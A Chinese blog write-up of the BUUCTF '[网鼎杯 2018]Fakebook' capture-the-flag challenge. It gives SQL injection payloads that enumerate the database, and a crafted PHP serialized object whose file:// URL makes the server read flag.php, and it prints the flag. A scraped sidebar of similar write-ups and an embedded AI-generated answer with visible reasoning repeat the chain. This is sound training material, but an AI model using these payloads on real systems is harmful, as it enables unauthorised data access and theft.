[网鼎杯 2018]Fakebook 1

已于 2022-07-20 09:25:14 修改
阅读量580 收藏 1
点赞数 1
文章标签: web
于 2022-07-04 08:14:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43618536/article/details/125583171
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[网鼎杯 2018]Fakebook 1

题目

BUUCTF的[网鼎杯 2018]Fakebook 1
在这里插入图片描述

一、做题步骤

1.收集信息

1.创建用户
在这里插入图片描述
2.登录
在这里插入图片描述
3.点击用户名,进入新页面
在这里插入图片描述
观察网址,这是一道注入的题目

2.测试

1.测试注入列数
说明注入列数为4

在这里插入图片描述
在这里插入图片描述

2.测试注入点
union select 被过滤
在这里插入图片描述替代
union/**/select
union all select

?no=0 union all select 1,2,3, 4 %23

2是注入点在这里插入图片描述

3.注入

1.爆数据库

?no=0 union all select 1,group_concat(schema_name),3, 4 from
information_schema.schemata %23

在这里插入图片描述

2.爆表名

?no=0 union all select 1,group_concat(table_name),3, 4 from
information_schema.tables where table_schema=‘fakebook’ #

在这里插入图片描述

3.爆字段

?no=0 union all select 1,group_concat(column_name),3, 4 from
information_schema.columns where table_name=‘users’ #

在这里插入图片描述
4.爆数据

?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #

在这里插入图片描述在这里插入图片描述
5.看到很多地方都提到了 /var/www/html/view.php
在这里插入图片描述
6.构造序列化结果
data中的数据

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:13:"www.baidu.com";}

进行修改

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

因为修改的部分是blog,因此将序列化结果放置在注入点4中

?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #

在这里插入图片描述

4.获取flag

1.查看最终页面的源代码,发现有base64密文
在这里插入图片描述2.解密该密文,或者直接点击该链接
获取flag{40e95ede-4d22-46b4-b71c-3f407d674ab5}
在这里插入图片描述

林本
关注
络安全 | CTF】fakebook2018)解题详析
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
buuctf-[ 2018]Fakebook
qq_42728977的博客
12-17 1214
[ 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
[ 2018]Fakebook1
whale_waves的博客
11-08 587
提示这里先用dirsearch扫一遍一般做题都要扫,这道题扫描速度不能太快,不然会429报错这里扫到了比较重要的两个,/var/www/html/flag.php这个肯定是不能直接访问的,但是还有robots.txt访问robots.txt看看这里有返回一个备份文件,下载来看看这里主要的有这点curl_exec这个函数用不好就会造成src漏洞所以这里就有了一个构成src漏洞的思路,继续往下走看怎么利用随便注册一个账户登录。
BUUCTF[ 2018]Fakebook 1
snowlyzz的博客
05-01 985
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
[2018}fakebook靶场思路,MariaDB注入,通关教程前言
xt350488的博客
08-14 1148
Tips:更多优质【络安全】文章主页。
[ 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1836
[ 2018]Fakebook 解题思路&过程
题解:BUUCTF [ 2018]Fakebook 1
qq_62886656的博客
06-14 787
题解
[ 2018]Fakebook1(BUUCTF闯关日记)
qq_64201116的博客
05-22 338
进入页面 源代码也没有什么东西,就先尝试一下注册一个账号试一下 注册成功后,可以进入页面看一眼,发现有一个自己的账号可以点进去,那就看看有什么 一看到url?no=1 DNA都动了一下,不假思索想到SQL注入,尝试一下 ?no=1 and 1=1 #咩问题 ?no=1 and 1=2 #出错的页面(所以多半存在sql注入) ?no=1 order by 4 没问题 ?no=1 order by 5 出错的页面(存在4个字段) 使用显错注入 同时这里还用到了内敛注释绕过,因为直接u
SSRF漏洞file伪协议之[ 2018]Fakebook1
qq_58970968的博客
07-06 1616
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-优快云博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
BUUCTF [ 2018]Fakebook 1
weixin_45642610的博客
01-19 5656
BUUCTF [ 2018]Fakebook 1 join(注册)一个账号,按用户名进入主页 发现注入点no no=1 order by 4#没事 no=1 order by 5#报错,有4列 no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。 爆表名 no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc
[ 2018]Fakebook1解题思路
xiyuanyue的博客
10-08 516
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
BUUCTF——[ 2018]Fakebook
m_de_g的博客
04-24 1445
【代码】BUUCTF——[ 2018]Fakebook
[ 2018]Fakebook 1保姆级解题思路
Welcome
11-16 1032
[ 2018]Fakebook 1保姆级解题思路。
[ 2018]Fakebook
抒情诗
04-17 404
[ 2018]Fakebook 不会,贴大佬的文章 https://blog.youkuaiyun.com/qq_42196196/article/details/81952174?depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1&utm_source=distribute.pc_re...
fakebook
最新发布
03-25
<think>好的,用户提到Fakebook,看起来可能与CTF题目有关,特别是2018的题目。用户引用了多个涉及SQL注入、PHP反序列化和SSRF的内容。首先,我需要整理这些引用中的关键点。 首先,引用[2]和[3]指出存在SQL注入点,使用union select进行注入,并且过滤了空格,需要用/**/代替。然后,通过构造特定的Payload,利用PHP反序列化漏洞,将UserInfo对象的blog属性设置为file://协议,触发SSRF读取服务器上的flag.php文件。引用[5]中的Payload示例进一步验证了这个方法。 用户可能在询问如何解决这个CTF题目,或者想了解相关的漏洞利用方法。需要分步骤解释漏洞的发现和利用过程,包括如何确定注入点、绕过过滤、构造Payload以及结合反序列化和SSRF获取flag。同时,根据用户提供的引用,确保回答的准确性,并正确标注引用来源。 最后,生成的相关问题需要围绕SQL注入、反序列化、SSRF以及该题目的其他可能解法,帮助用户深入理解每个步骤的原理和相关技术。</think>### Fakebook漏洞分析与利用(2018) 根据提供的参考资料,该题目主要涉及SQL注入、PHP反序列化、SSRF(服务端请求伪造)的综合利用,以下是关键分析步骤: --- #### 1. **漏洞发现** - **注入点定位**:通过参数`?no=1`发现存在数字型SQL注入,使用`?no=0++order++by++4--+`确认字段数为4[^2] - **过滤绕过**:对空格进行过滤,可用`/**/`或`++`代替,如`union/**/select`构造注入语句[^3] --- #### 2. **漏洞利用** **Step 1 - 报错注入验证** ```sql ?no=0/**/union/**/select+updatexml(1,concat(0x7e,database()),1),2,3,4--+ ``` 通过报错信息可获取数据库名`fakebook`[^3] **Step 2 - 联合查询构造** ```sql ?no=-1/**/union/**/select+1,2,3,4--+ ``` 确认回显位置后,替换有效字段为数据查询结果[^5] **Step 3 - 反序列化+SSRF** 构造包含`file://`协议的PHP序列化对象: ```php O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";} ``` 通过SQL注入将该对象写入查询结果: ```sql ?no=-1/**/union/**/select+1,2,3,'<序列化字符串>'--+ ``` 触发反序列化后,`blog`属性会通过`file://`协议读取服务器本地的flag.php文件 --- #### 3. **技术原理** - **SQL注入**:利用`UNION SELECT`合并恶意查询结果 - **PHP反序列化**:`UserInfo`类实例化时自动加载`blog`属性 - **SSRF**:`file://`协议绕过络限制访问本地文件[^4] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值